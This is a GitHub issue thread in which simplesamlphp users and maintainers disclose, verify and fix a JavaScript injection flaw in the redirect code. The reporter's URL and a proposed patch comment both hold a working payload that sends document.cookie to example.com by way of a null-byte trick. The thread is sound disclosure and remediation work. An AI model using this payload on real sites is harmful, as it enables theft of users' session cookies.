### ISSUE TITLE
possible xss vulnerability

### ISSUE THREAD

**Issue by CSiPet2** [simplesamlphp/simplesamlphp#699]
Deployed simplesamlphp as an IDP for a client, and they contracted a pentest company to run a check on the box. It seems that they found a vulnerability in simplesamlphp itselft, which I am able to reproduce.
Calling `https://domain.com/samllogin/module.php/core/cleardiscochoices.php?ReturnTo=%27);document.location=%27http://www.example.com/%27%2bdocument.cookie;a(%27a%00` actually redirects to examle.com.

Starting from cleardiscochoices.php that url passed to HTTP::checkURLAllowed() and than HTTP::redirectTrustedURL() finally ends up in HTTP::redirect() with
`You were redirected to: https://domain.com/samllogin/module.php/core/');document.location='http:/www.example.com/'+document.cookie;a('a` content.

The code where this could be a problem in the redirect() method looks like this:
`echo "  <body onload=\"window.location.replace('".htmlspecialchars($url)."');\">\n";`
so we end up with this javascript:
`window.location.replace('https://domain.com/samllogin/module.php/core/');document.location='http:/www.example.com/'+document.cookie;a('a');`

And the document.location will be executed.

Could someone verify this?

**Comment by tvdijen** [comment]
I can verify this redirection is invoked on 1.15rc1

**Comment by tvdijen** [comment]
We could insert the followingr ight before https://github.com/simplesamlphp/simplesamlphp/blob/master/modules/core/www/cleardiscochoices.php#L29:

`    /* Prevent JavaScript injection to evade \SimpleSAML\Utils\checkUrlAllowed()
`     * https://idp.test.com/module.php/core/cleardiscochoices.php?ReturnTo=');document.location='http://www.example.com/'%2bdocument.cookie;a('a%00
`     */
`    if (filter_var($returnTo, FILTER_VALIDATE_URL) === false) {
`        throw new \SimpleSAML_Error_Exception('Invalid URL: ' . $url);
`    }

**Comment by CSiPet2** [comment]
Works for me, thanks! :)

**Comment by jaimeperez** [comment]
Hi @CSiPet2!

This is indeed a very unfortunate issue, and it was my fault 😞 

The issue is much more serious than it might appear at first, because it can be exploited through any script that performs a redirection to a user-given URL, not only `cleardiscochoices.php`. Another example is `www/saml2/idp/initSLO.php`. Additionally, as Tim points out, this is not an XSS, but Javascript injection, which is much worse because it allows an attacker to run code in the user's browser, and even exploit more issues (like a bad configuration) to, say, obtain the user's cookies.

That given, it's definitely not enough to use `filter_var()` in `cleardiscochoices.php`. The right way is to make sure that when we check if a URL is allowed, the given URL **is a valid URL** and doesn't contain spurious characters. This won't avoid Javascript code being present in the given URL, because all those characters are actually allowed. But it fixes the issue because the key part here is the _null_ character by the end. A _null_ character in the URL silently breaks calls to `header()` to add a `Location` HTTP header. When that is present in the URL (no matter where), the call fails and the rest of the following code continues to execute. If no `Location` HTTP header is set, the response sent by the server is an `HTTP 200 OK`, and then the HTML with the injected Javascript is sent to the browser, which in turn prints the page and runs the code.

The other fix is to stop using an `onload` event in the body of the redirect page to perform the redirection if the HTTP redirection fails. There's simply no need for that. It can be done with a _meta refresh_ redirection, so we're using that now.

In any case, it is fixed now in master. Thanks a lot @CSiPet2 for reporting it. Luckily this never ended up in a stable version.
